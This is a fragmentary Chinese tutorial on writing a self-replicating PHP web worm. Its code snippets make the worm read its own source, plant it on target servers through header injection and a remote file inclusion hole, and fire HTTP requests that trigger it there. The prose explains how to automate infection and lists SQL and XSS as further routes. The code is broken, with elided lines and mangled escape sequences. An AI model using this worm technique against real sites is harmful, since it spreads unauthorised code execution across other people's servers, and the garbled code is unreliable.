教你编写WEB蠕虫

　　$source = str_replace("$", "\$",str_replace(""", "\"",str_replace("\",
　　"\\",file_get_contents($_SERVER['PHP_SELF']))));
　　...
　　Client-Ip:
　　"$source");fclose($fp); ?>rn ...
　　...
　　for ($i=0;$i<2;$i++) { $bob = make_request($domain, $packet); }
　　make_request($domain, "GET $location/data/flood.db.php HTTP/1.1rnHost:
　　$domainrnConnection: closernrn");

其它感染方式：PHP文件包含

关于将PHP文件包含漏洞的处理自动化的技术也并不是很难，通常我们粗劣写出来的PHP脚本都普遍含有这样一段代码，该代码存在远程PHP代码执行漏洞，我们可以将一小段PHP代码作为GET 变量'page'的值，然后通过URL进行传输。这样我们的通过URL来发送HTTP GET request 以使其在其它服务器上自行运行，蠕虫就可以在WEB的根目录下的一些地方进行自我复制了。

　　$fp = fopen("sekret.txt", "w");
　　fwrite($fp, file_get_contents($_SERVER['PHP_SELF']));
　　fclose($fp);
　　$url = $_SERVER['SCRIPT_URI'];
　　make_request($domain, "GET /test.php?path=$url HTTP/1.1rnHost:
　　$domainrnConnection: closernrn");

其它感染方式：SQL

其它感染方式：JavaScript / XSS

===搜集目标===

在worm开发期间，最为明智的做法是将实际的利用代码与目标搜集代码相分离开来。你可以在自己的机器上或局域网内，使用类似下列的代码进行测试：